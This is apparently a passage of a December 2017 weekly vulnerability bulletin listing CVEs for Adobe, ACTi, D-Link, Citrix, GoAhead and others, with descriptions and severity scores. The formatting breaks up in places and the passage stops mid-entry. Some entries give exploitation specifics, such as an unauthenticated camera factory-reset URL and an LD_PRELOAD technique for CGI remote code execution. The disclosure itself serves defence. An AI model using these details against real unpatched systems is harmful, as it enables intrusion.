adobe -- acrobat | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a computation that writes data past the end of the intended buffer; the computation is part of processing Enhanced Metafile Format Plus (EMF+). The vulnerability is a result of an out of range pointer offset that is used to access sub-elements of an internal data structure. An attacker can potentially leverage the vulnerability to corrupt sensitive data or execute arbitrary code. | 2017-12-09 | 9.3 | CVE-2017-16404 (BID, SECTRACK, CONFIRM)
adobe -- acrobat | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of Acrobat's page display functionality. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure. | 2017-12-09 | 9.3 | CVE-2017-16405 (BID, SECTRACK, CONFIRM)
adobe -- acrobat | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a type confusion vulnerability in the EMF processing module. The issue causes the program to access an object using an incompatible type, leading to an out of bounds memory access. Attackers can exploit the vulnerability by using the out of bounds access for unintended reads, writes, or frees -- potentially leading to code corruption, control-flow hijack, or information leak attack. | 2017-12-09 | 9.3 | CVE-2017-16406 (BID, SECTRACK, CONFIRM)
adobe -- acrobat | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a computation that writes data past the end of the intended buffer; the computation is part of handling an EMF EMR_BITBLT record. The vulnerability is a result of an out of range pointer offset that is used to access sub-elements of an internal data structure. An attacker can potentially leverage the vulnerability to corrupt sensitive data or execute arbitrary code. | 2017-12-09 | 9.3 | CVE-2017-16407 (BID, SECTRACK, CONFIRM)
adobe -- acrobat | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the WebCapture module. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure. | 2017-12-09 | 9.3 | CVE-2017-16408 (BID, SECTRACK, CONFIRM)
adobe -- acrobat | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the Adobe graphics module responsible for displaying textual data. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure. | 2017-12-09 | 9.3 | CVE-2017-16409 (BID, SECTRACK, CONFIRM)
adobe -- acrobat | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is a result of untrusted input that is used to calculate an array index; the calculation occurs in the image conversion module, when processing GIF files. The vulnerability leads to an operation that can write to a memory location that is outside of the memory addresses allocated for the data structure. The specific scenario leads to a write access to a memory location that does not belong to the relevant process address space. | 2017-12-09 | 9.3 | CVE-2017-16410 (BID, SECTRACK, CONFIRM)
adobe -- acrobat | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the WebCapture module, related to an internal hash table implementation. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure. | 2017-12-09 | 9.3 | CVE-2017-16411 (BID, SECTRACK, CONFIRM)
adobe -- acrobat_and_reader | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs because of a computation that reads data that is past the end of the target buffer; the computation is part of the XPS conversion module, when handling a JPEG resource. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure. | 2017-12-09 | 9.3 | CVE-2017-16412 (BID, SECTRACK, CONFIRM)
adobe -- acrobat | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a computation that writes data past the end of the intended buffer; the computation is part of the XPS to PDF conversion module, when processing TIFF files. The vulnerability is a result of an out of range pointer offset that is used to access sub-elements of an internal data structure. An attacker can potentially leverage the vulnerability to corrupt sensitive data or execute arbitrary code. | 2017-12-09 | 9.3 | CVE-2017-16413 (BID)
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the JavaScript API module responsible for form field computation. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16414
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a computation that writes data past the end of the intended buffer; the computation is a part of the functionality that handles font encodings. The vulnerability is a result of out of range pointer offset that is used to access sub-elements of an internal data structure. An attacker can potentially leverage the vulnerability to corrupt sensitive data or execute arbitrary code.2017-12-099.3CVE-2017-16415
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a computation that writes data past the end of the intended buffer; the computation is part of the image conversion module that handles Enhanced Metafile Format Plus (EMF+) data. The vulnerability is a result of an out of range pointer offset that is used to access sub-elements of an internal data structure. An attacker can potentially leverage the vulnerability to corrupt sensitive data or execute arbitrary code.2017-12-099.3CVE-2017-16416
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the font parsing module. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16417
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the image conversion module that handles XPS files. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16418
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is in the part of the JavaScript engine that handles annotation abstraction. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16420
BID
SECTRACK
CONFIRM
adobe -- photoshopAn issue was discovered in Adobe Photoshop 18.1.1 (2017.1.1) and earlier versions. An exploitable memory corruption vulnerability exists. Successful exploitation could lead to arbitrary code execution.2017-12-097.5CVE-2017-11303
BID
SECTRACK
CONFIRM
adobe -- photoshopAn issue was discovered in Adobe Photoshop 18.1.1 (2017.1.1) and earlier versions. An exploitable use-after-free vulnerability exists. Successful exploitation could lead to arbitrary code execution.2017-12-097.5CVE-2017-11304
BID
SECTRACK
CONFIRM
Back to top

 

Medium Vulnerabilities

Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info

adobe -- acrobat
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a security bypass vulnerability when handling XFDF files.
Published: 2017-12-09 | CVSS Score: 4.3 | CVE-2017-16361
Source & Patch Info: BID, SECTRACK, CONFIRM

adobe -- acrobat
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a security bypass vulnerability in the AcroPDF plugin.
Published: 2017-12-09 | CVSS Score: 5.0 | CVE-2017-16366
Source & Patch Info: BID, SECTRACK, CONFIRM

adobe -- acrobat
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a Same Origin Policy security bypass vulnerability, affecting files on the local system, etc.
Published: 2017-12-09 | CVSS Score: 4.3 | CVE-2017-16369
Source & Patch Info: BID, SECTRACK, CONFIRM

adobe -- acrobat
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The issue is a stack exhaustion problem within the JavaScript API, where the computation does not correctly control the amount of recursion that can happen with respect to system resources.
Published: 2017-12-09 | CVSS Score: 4.3 | CVE-2017-16419
Source & Patch Info: BID, SECTRACK, CONFIRM

adobe -- connect
An issue was discovered in Adobe Connect 9.6.2 and earlier versions. A reflected cross-site scripting vulnerability exists that can result in information disclosure.
Published: 2017-12-09 | CVSS Score: 4.3 | CVE-2017-11287
Source & Patch Info: BID, SECTRACK, CONFIRM

adobe -- connect
An issue was discovered in Adobe Connect 9.6.2 and earlier versions. A reflected cross-site scripting vulnerability exists that can result in information disclosure.
Published: 2017-12-09 | CVSS Score: 4.3 | CVE-2017-11288
Source & Patch Info: BID, SECTRACK, CONFIRM

adobe -- connect
An issue was discovered in Adobe Connect 9.6.2 and earlier versions. A reflected cross-site scripting vulnerability exists that can result in information disclosure.
Published: 2017-12-09 | CVSS Score: 4.3 | CVE-2017-11289
Source & Patch Info: BID, SECTRACK, CONFIRM

adobe -- connect
An issue was discovered in Adobe Connect 9.6.2 and earlier versions. A UI Redress (or Clickjacking) vulnerability exists. This issue has been resolved by adding a feature that enables Connect administrators to protect users from UI redressing (or clickjacking) attacks.
Published: 2017-12-09 | CVSS Score: 4.3 | CVE-2017-11290
Source & Patch Info: BID, SECTRACK, CONFIRM

adobe -- connect
An issue was discovered in Adobe Connect 9.6.2 and earlier versions. A Server-Side Request Forgery (SSRF) vulnerability exists that could be abused to bypass network access controls.
Published: 2017-12-09 | CVSS Score: 6.4 | CVE-2017-11291
Source & Patch Info: BID, SECTRACK, CONFIRM

adobe -- digital_editions
An issue was discovered in Adobe Digital Editions 4.5.6 and earlier versions. Adobe Digital Editions parses crafted XML files in an unsafe manner, which could lead to sensitive information disclosure.
Published: 2017-12-09 | CVSS Score: 4.3 | CVE-2017-11273
Source & Patch Info: BID, SECTRACK, CONFIRM

adobe -- digital_editions
An issue was discovered in Adobe Digital Editions 4.5.6 and earlier versions. An exploitable memory corruption vulnerability exists, which could lead to disclosure of memory addresses.
Published: 2017-12-09 | CVSS Score: 5.0 | CVE-2017-11297
Source & Patch Info: BID, SECTRACK, CONFIRM

adobe -- digital_editions
An issue was discovered in Adobe Digital Editions 4.5.6 and earlier versions. An exploitable memory corruption vulnerability exists, which could lead to disclosure of memory addresses.
Published: 2017-12-09 | CVSS Score: 5.0 | CVE-2017-11298
Source & Patch Info: BID, SECTRACK, CONFIRM

adobe -- digital_editions
An issue was discovered in Adobe Digital Editions 4.5.6 and earlier versions. An exploitable memory corruption vulnerability exists, which could lead to disclosure of memory addresses.
Published: 2017-12-09 | CVSS Score: 5.0 | CVE-2017-11299
Source & Patch Info: BID, SECTRACK, CONFIRM

adobe -- digital_editions
An issue was discovered in Adobe Digital Editions 4.5.6 and earlier versions. An exploitable memory corruption vulnerability exists, which could lead to disclosure of memory addresses.
Published: 2017-12-09 | CVSS Score: 5.0 | CVE-2017-11300
Source & Patch Info: BID, SECTRACK, CONFIRM

adobe -- digital_editions
An issue was discovered in Adobe Digital Editions 4.5.6 and earlier versions. An exploitable memory corruption vulnerability exists, which could lead to disclosure of memory addresses.
Published: 2017-12-09 | CVSS Score: 5.0 | CVE-2017-11301
Source & Patch Info: BID, SECTRACK, CONFIRM

adobe -- experience_manager
An issue was discovered in Adobe Experience Manager 6.3, 6.2, 6.1, 6.0. A cross-site scripting vulnerability in Apache Sling Servlets Post 2.3.20 has been resolved in Adobe Experience Manager.
Published: 2017-12-09 | CVSS Score: 4.3 | CVE-2017-11296
Source & Patch Info: BID, SECTRACK, CONFIRM

adobe -- experience_manager
An issue was discovered in Adobe Experience Manager 6.3, 6.2, 6.1, 6.0. Adobe Experience Manager has a reflected cross-site scripting vulnerability in the HtmlRendererServlet.
Published: 2017-12-09 | CVSS Score: 4.3 | CVE-2017-3109
Source & Patch Info: BID, SECTRACK, CONFIRM

adobe -- experience_manager
An issue was discovered in Adobe Experience Manager 6.3, 6.2, 6.1, 6.0. Sensitive tokens are included in http GET requests under certain circumstances.
Published: 2017-12-09 | CVSS Score: 5.0 | CVE-2017-3111
Source & Patch Info: BID, SECTRACK, CONFIRM

Low Vulnerabilities

Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info

There were no low vulnerabilities recorded this week.


Severity Not Yet Assigned

Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info

abiword -- abiword
af/util/xp/ut_go_file.cpp in AbiWord 3.0.2-2 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.
Published: 2017-12-14 | CVSS Score: not yet calculated | CVE-2017-17529
Source & Patch Info: MISC

acdsee -- acdsee_ultimate_10.0.0.292
A memory corruption vulnerability exists in the .PSD parsing functionality of ACDSee Ultimate 10.0.0.292. A specially crafted .PSD file can cause an out of bounds write vulnerability resulting in potential code execution. An attacker can send a specific .PSD file to trigger this vulnerability.
Published: 2017-12-11 | CVSS Score: not yet calculated | CVE-2017-2886
Source & Patch Info: BID, MISC

acti -- acti_cameras
ACTi cameras including the D, B, I, and E series using firmware version A1D-500-V6.11.31-AC use non-random default credentials across all devices. A remote attacker can take complete control of a device using default admin credentials.
Published: 2017-12-15 | CVSS Score: not yet calculated | CVE-2017-3186
Source & Patch Info: BID, MISC, MISC, CERT-VN

acti -- acti_cameras
ACTi cameras including the D, B, I, and E series using firmware version A1D-500-V6.11.31-AC fail to properly restrict access to the factory reset page. An unauthenticated, remote attacker can exploit this vulnerability by directly accessing the http://x.x.x.x/setup/setup_maintain_firmware-default.html page. This will allow an attacker to perform a factory reset on the device, leading to a denial of service condition or the ability to make use of default credentials (CVE-2017-3186).
Published: 2017-12-15 | CVSS Score: not yet calculated | CVE-2017-3184
Source & Patch Info: BID, MISC, MISC, CERT-VN

acti -- acti_cameras
ACTi cameras including the D, B, I, and E series using firmware version A1D-500-V6.11.31-AC have a web application that uses the GET method to process requests that contain sensitive information such as user account name and password, which can expose that information through the browser's history, referrers, web logs, and other sources.
Published: 2017-12-15 | CVSS Score: not yet calculated | CVE-2017-3185
Source & Patch Info: BID, MISC, MISC, CERT-VN

adobe -- acrobat
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. An exploitable memory corruption vulnerability exists. Successful exploitation could lead to arbitrary code execution.
Published: 2017-12-09 | CVSS Score: not yet calculated | CVE-2017-11293
Source & Patch Info: BID, SECTRACK, CONFIRM

adobe -- dng
An issue was discovered in Adobe DNG Converter 9.12.1 and earlier versions. An exploitable memory corruption vulnerability exists. Successful exploitation could lead to arbitrary code execution.
Published: 2017-12-09 | CVSS Score: not yet calculated | CVE-2017-11295
Source & Patch Info: BID, CONFIRM

adobe -- flash_player
An issue was discovered in Adobe Flash Player 27.0.0.183 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the Primetime SDK metadata functionality. The mismatch between an old and a new object can provide an attacker with unintended memory access -- potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution.
Published: 2017-12-09 | CVSS Score: not yet calculated | CVE-2017-11225
Source & Patch Info: BID, SECTRACK, REDHAT, CONFIRM, GENTOO

adobe -- flash_player
An issue was discovered in Adobe Flash Player 27.0.0.183 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of providing language- and region- or country-specific functionality. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.
Published: 2017-12-09 | CVSS Score: not yet calculated | CVE-2017-3114
Source & Patch Info: BID, SECTRACK, REDHAT, CONFIRM, GENTOO

adobe -- flash_player
An issue was discovered in Adobe Flash Player 27.0.0.183 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the Primetime SDK. The mismatch between an old and a new object can provide an attacker with unintended memory access -- potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution.
Published: 2017-12-09 | CVSS Score: not yet calculated | CVE-2017-11215
Source & Patch Info: BID, SECTRACK, REDHAT, CONFIRM, GENTOO

adobe -- flash_player
An issue was discovered in Adobe Flash Player 27.0.0.183 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer due to an integer overflow; the computation is part of the abstraction that creates an arbitrarily sized transparent or opaque bitmap image. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.
Published: 2017-12-09 | CVSS Score: not yet calculated | CVE-2017-11213
Source & Patch Info: BID, SECTRACK, REDHAT, CONFIRM, GENTOO

adobe -- flash_player
A regression affecting Adobe Flash Player version 27.0.0.187 (and earlier versions) causes the unintended reset of the global settings preference file when a user clears browser data.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-11305
Source & Patch Info: BID, SECTRACK, CONFIRM

adobe -- flash_player
An issue was discovered in Adobe Flash Player 27.0.0.183 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of AdobePSDK metadata. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.
Published: 2017-12-09 | CVSS Score: not yet calculated | CVE-2017-3112
Source & Patch Info: BID, SECTRACK, REDHAT, CONFIRM, GENTOO

adobe -- indesign
An issue was discovered in Adobe InDesign 12.1.0 and earlier versions. An exploitable memory corruption vulnerability exists. Successful exploitation could lead to arbitrary code execution.
Published: 2017-12-09 | CVSS Score: not yet calculated | CVE-2017-11302
Source & Patch Info: BID, SECTRACK, CONFIRM

adobe -- shockwave
An issue was discovered in Adobe Shockwave 12.2.9.199 and earlier. An exploitable memory corruption vulnerability exists. Successful exploitation could lead to arbitrary code execution.
Published: 2017-12-09 | CVSS Score: not yet calculated | CVE-2017-11294
Source & Patch Info: BID, SECTRACK, CONFIRM
amag_technologies -- symmetry_edge_network_door_controllers
Incorrect access control in AMAG Symmetry Door Edge Network Controllers (EN-1DBC Boot App 23611 03.60 and STD App 23603 03.60; EN-2DBC Boot App 24451 01.00 and STD App 2461 01.00) enables remote attackers to execute door controller commands (e.g., lock, unlock, add ID card value) by sending unauthenticated requests to the affected devices via Serial over TCP/IP, as demonstrated by a Ud command.
Published: 2017-12-09 | CVSS Score: not yet calculated | CVE-2017-16241
Source & Patch Info: MISC, MISC, MISC

apache -- fineract
In Apache Fineract 0.4.0-incubating, 0.5.0-incubating, and 0.6.0-incubating, an authenticated user with client/loan/center/staff/group read permissions is able to inject malicious SQL into SELECT queries. The 'sqlSearch' parameter on a number of endpoints is not sanitized and appended directly to the query.
Published: 2017-12-14 | CVSS Score: not yet calculated | CVE-2017-5663
Source & Patch Info: MLIST

apache -- synapse
Due to the presence of Apache Commons Collections 3.2.1 (commons-collections-3.2.1.jar) or previous versions, Apache Synapse 3.0.0 or all previous releases (3.0.0, 2.1.0, 2.0.0, 1.2, 1.1.2, 1.1.1) allows remote code execution attacks that can be performed by injecting specially crafted serialized objects. To mitigate the issue, upgrading to version 3.0.1 is required. In Synapse version 3.0.1, Commons Collections has been updated to version 3.2.2, which contains the fix for the above mentioned vulnerability.
Published: 2017-12-11 | CVSS Score: not yet calculated | CVE-2017-15708
Source & Patch Info: BID, MLIST

asterisk -- multiple_products
A Remote Crash issue was discovered in Asterisk Open Source 13.x before 13.18.4, 14.x before 14.7.4, and 15.x before 15.1.4 and Certified Asterisk before 13.13-cert9. Certain compound RTCP packets cause a crash in the RTCP Stack.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17664
Source & Patch Info: MISC, BID, MISC, MISC

atlassian -- bamboo
Bamboo did not check that the name of a branch in a Mercurial repository contained argument parameters. An attacker who has permission to create a repository in Bamboo, edit an existing plan that has a non-linked Mercurial repository, create or edit a plan when there is at least one linked Mercurial repository that the attacker has permission to use, or commit to a Mercurial repository used by a Bamboo plan which has branch detection enabled can execute code of their choice on systems that run a vulnerable version of Bamboo Server. Versions of Bamboo starting with 2.7.0 before 6.1.6 (the fixed version for 6.1.x) and from 6.2.0 before 6.2.5 (the fixed version for 6.2.x) are affected by this vulnerability.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-14590
Source & Patch Info: BID, CONFIRM, CONFIRM

atlassian -- bamboo
It was possible for double OGNL evaluation in FreeMarker templates through Struts FreeMarker tags to occur. An attacker who has restricted administration rights to Bamboo or who hosts a website that a Bamboo administrator visits is able to exploit this vulnerability to execute Java code of their choice on systems that run a vulnerable version of Bamboo. All versions of Bamboo before 6.1.6 (the fixed version for 6.1.x) and from 6.2.0 before 6.2.5 (the fixed version for 6.2.x) are affected by this vulnerability.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-14589
Source & Patch Info: BID, CONFIRM, CONFIRM

aubio -- aubio
A NULL pointer dereference (DoS) vulnerability was found in the function aubio_source_avcodec_readframe in io/source_avcodec.c of aubio 0.4.6, which may lead to DoS when playing a crafted audio file.
Published: 2017-12-11 | CVSS Score: not yet calculated | CVE-2017-17554
Source & Patch Info: MISC

bernard_parisse_giac -- bernard_parisse_giac
Input.cc in Bernard Parisse Giac 1.2.3.57 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.
Published: 2017-12-14 | CVSS Score: not yet calculated | CVE-2017-17526
Source & Patch Info: MISC

bob_hepple_gjots2 -- bob_hepple_gjots2
lib/gui.py in Bob Hepple gjots2 2.4.1 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.
Published: 2017-12-14 | CVSS Score: not yet calculated | CVE-2017-17535
Source & Patch Info: MISC

boxug -- trape
Trape before 2017-11-05 has XSS via the /nr red parameter, the /nr vId parameter, the /register User-Agent HTTP header, the /register country parameter, the /register countryCode parameter, the /register cpu parameter, the /register isp parameter, the /register lat parameter, the /register lon parameter, the /register org parameter, the /register query parameter, the /register region parameter, the /register regionName parameter, the /register timezone parameter, the /register vId parameter, the /register zip parameter, or the /tping id parameter.
Published: 2017-12-16 | CVSS Score: not yet calculated | CVE-2017-17714
Source & Patch Info: MISC, MISC, MISC

boxug -- trape
Trape before 2017-11-05 has SQL injection via the /nr red parameter, the /nr vId parameter, the /register User-Agent HTTP header, the /register country parameter, the /register countryCode parameter, the /register cpu parameter, the /register isp parameter, the /register lat parameter, the /register lon parameter, the /register org parameter, the /register query parameter, the /register region parameter, the /register regionName parameter, the /register timezone parameter, the /register vId parameter, the /register zip parameter, or the /tping id parameter.
Published: 2017-12-16 | CVSS Score: not yet calculated | CVE-2017-17713
Source & Patch Info: MISC, MISC, MISC, MISC, MISC
cisco -- asa_5500_series_routers
A vulnerability in the TLS protocol implementation of legacy Cisco ASA 5500 Series (ASA 5505, 5510, 5520, 5540, and 5550) devices could allow an unauthenticated, remote attacker to access sensitive information, aka a Return of Bleichenbacher's Oracle Threat (ROBOT) attack. An attacker could iteratively query a server running a vulnerable TLS stack implementation to perform cryptanalytic operations that may allow decryption of previously captured TLS sessions. Cisco Bug IDs: CSCvg97652.
Published: 2017-12-15 | CVSS Score: not yet calculated | CVE-2017-12373
Source & Patch Info: CONFIRM

citrix -- multiple_products
Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway 10.5 before build 67.13, 11.0 before build 71.22, 11.1 before build 56.19, and 12.0 before build 53.22 might allow remote attackers to decrypt TLS ciphertext data by leveraging a Bleichenbacher RSA padding oracle, aka a ROBOT attack.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17382
Source & Patch Info: BID, SECTRACK, MISC, CONFIRM, CERT-VN

citrix -- multiple_products
Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway 10.5 before build 67.13, 11.0 before build 71.22, 11.1 before build 56.19, and 12.0 before build 53.22 allow remote attackers to obtain sensitive information from the backend client TLS handshake by leveraging use of TLS with Client Certificates and a Diffie-Hellman Ephemeral (DHE) key exchange.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17549
Source & Patch Info: BID, SECTRACK, CONFIRM

commvault -- edge_communication_service
Commvault Edge Communication Service (cvd) prior to version 11 SP7 or version 11 SP6 with hotfix 590 is prone to a stack-based buffer overflow vulnerability that could lead to arbitrary code execution with administrative privileges.
Published: 2017-12-15 | CVSS Score: not yet calculated | CVE-2017-3195
Source & Patch Info: CONFIRM, MISC, BID, EXPLOIT-DB, CERT-VN

crowdfunding_software -- realestate_crowdfunding_script
Realestate Crowdfunding Script 2.7.2 has SQL Injection via the single-cause.php pid parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17591
Source & Patch Info: MISC

d-link -- dir-130_firmware_version_1.23_and_dir-330_firmware_version_1.12
D-Link DIR-130 firmware version 1.23 and DIR-330 firmware version 1.12 are vulnerable to authentication bypass of the remote login page. A remote attacker that can access the remote management login page can manipulate the POST request in such a manner as to access some administrator-only pages such as tools_admin.asp without credentials.
Published: 2017-12-15 | CVSS Score: not yet calculated | CVE-2017-3191
Source & Patch Info: MISC, CERT-VN, MISC, MISC

d-link -- dir-130_firmware_version_1.23_and_dir-330_firmware_version_1.12
D-Link DIR-130 firmware version 1.23 and DIR-330 firmware version 1.12 do not sufficiently protect administrator credentials. The tools_admin.asp page discloses the administrator password in base64 encoding in the returned web page. A remote attacker with access to this page (potentially through an authentication bypass such as CVE-2017-3191) may obtain administrator credentials for the device.
Published: 2017-12-15 | CVSS Score: not yet calculated | CVE-2017-3192
Source & Patch Info: MISC, CERT-VN, MISC, MISC

d-link -- multiple_devices
Multiple D-Link devices including the DIR-850L firmware versions 1.14B07 and 2.07.B05 contain a stack-based buffer overflow vulnerability in the web administration interface HNAP service.
Published: 2017-12-15 | CVSS Score: not yet calculated | CVE-2017-3193
Source & Patch Info: BID, MISC, MISC, CERT-VN, MISC

elemental_path -- cognitoys_dino_smart_toys
Elemental Path's CogniToys Dino smart toys through firmware version 0.0.794 share a fixed small pool of hardcoded keys, allowing a remote attacker to use a different Dino device to decrypt VoIP traffic between a child's Dino and remote server.
Published: 2017-12-11 | CVSS Score: not yet calculated | CVE-2017-8866
Source & Patch Info: MISC

elemental_path -- cognitoys_dino_smart_toys
Elemental Path's CogniToys Dino smart toys through firmware version 0.0.794 use AES-128 with ECB mode to encrypt voice traffic between the device and remote server, allowing a malicious user to map encrypted traffic to a particular AES key index and gaining further access to eavesdrop on privacy-sensitive voice communication of a child and their Dino device.
Published: 2017-12-11 | CVSS Score: not yet calculated | CVE-2017-8867
Source & Patch Info: MISC

elemental_path -- cognitoys_dino_smart_toys
Elemental Path's CogniToys Dino smart toys through firmware version 0.0.794 do not provide sufficient protections against capture-replay attacks, allowing an attacker on the network to replay VoIP traffic between a Dino device and remote server to any other Dino device.
Published: 2017-12-11 | CVSS Score: not yet calculated | CVE-2017-8865
Source & Patch Info: MISC
embedthis -- goahead
 
Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked. This is a result of initializing the environment of forked CGI scripts using untrusted HTTP request parameters in the cgiHandler function in cgi.c. When combined with the glibc dynamic linker, this behaviour can be abused for remote code execution using special parameter names such as LD_PRELOAD. An attacker can POST their shared object payload in the body of the request, and reference it using /proc/self/fd/0.2017-12-12not yet calculatedCVE-2017-17562
MISC
MISC
emc -- isilon_onefs
 
